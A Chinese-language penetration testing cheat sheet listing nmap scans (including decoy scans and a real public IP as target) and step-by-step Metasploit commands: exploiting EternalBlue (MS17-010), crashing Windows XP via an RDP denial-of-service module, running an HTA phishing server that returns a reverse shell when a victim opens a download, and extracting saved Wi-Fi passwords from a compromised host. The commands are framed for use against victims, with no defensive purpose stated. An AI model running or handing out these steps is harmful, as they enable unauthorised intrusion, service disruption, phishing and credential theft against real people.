渗透测试

信息搜集

nmap --sP -iL abin.txt （从abin.txt导入ip地址列表进行扫描，-sP主机存货判断）
nmap -A 120.55.226.24 （启用操作系统检测，版本检测，脚本扫描和跟踪路由）
nmap -sS 120.55.226.24 （半连接扫描）
nmap -sT 120.55.226.24 （全连接扫描）
nmap -sU 120.55.226.24 （udp扫描）
nmap -D 1.1.1.1 192.168.1.102 （伪装地址为1.1.1.1）
nmap --mtu 8 192.168.1.102 （指定每个扫描包的大小）

nmap ip -v 10.1.2.1/24 (扫描代表的是10.1.2.1 ~ 10.1.2.255 进行扫描)
还有很多的工具,最常用的就是nmap,还有一个是xerosploit
xerosploit安装:
$ git clone https://github.com/LionSec/xerosploit.git
接下来，用sudo命令运行安装脚本install.py：
$ sudo python install.py

漏洞利用工具msf

msf打开方式

直接在终端输入msfconsole
进入msf的目录/usr/share/metasploit-framework，运行命令./msfconsole

更新

kali 运行命令apt update,apt install metasploit-framework

------------------------------------------------------------------------------------------

1 How to exploit Windows Vista only by victim's using Kali Linux (永恒之蓝漏洞)

(smb_ms17_010)
# msfconsole
#msf> use auxiliary/scanner/smb/smb_ms17_010 (利用该模块查看对方主机是否存在该漏洞)
#msf> set RHOSTS (remote ip) (设置对方ip)
#msf> run (开始扫描)
#msf> use exploit/windows/smb/ms17_010_psexec (若扫描成功存在该漏洞,就开始利用这个利用模块)
#msf> set RHOSTS (remote ip) (设置对方ip)
#msf> exploit (开始渗透)

------------------------------------------------------------------------------------------

2. How to crash windows xp(blue screen) with metasploit using kali linux (如何让winxp蓝屏)

# msfconsole
#msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (漏洞利用)
#msf> set rhost (remote ip)
#msf> exploit  

------------------------------------------------------------------------------------------

3. How to exploit windows with HTA server using kali linux (搞一个钓鱼网战,当用户点击下载的打开就中招)

#msfconsole
#msf> use windows/misc/hta_server/ (利用该模块)
#msf> set srvhost (local ip) (设置服务器ip,通常是自己的ip)
#msf> set uripath / (设置服务器路径)
#msf> exploit (开始监听渗透)
打开网页下载打开后.
#msf> sessions (若别人下载打开之后,会出现payload反弹,使用该名令来查看靶机)
#msf> sessions -i num (切换到渗透的靶机)

------------------------------------------------------------------------------------------

5 How to get Windows Wi-Fi saved passwords using Metasploit and Kali Linux (如何获取对方的wifi密码)

前提: 获取windows shell
#msf> shell
cmd> netsh wlan show profile (查看已缓存的wifi)
cmd> netsh wlan show profile [wifi_name] key=clear (查看选定的wifi名密码)

------------------------------------------------------------------------------------------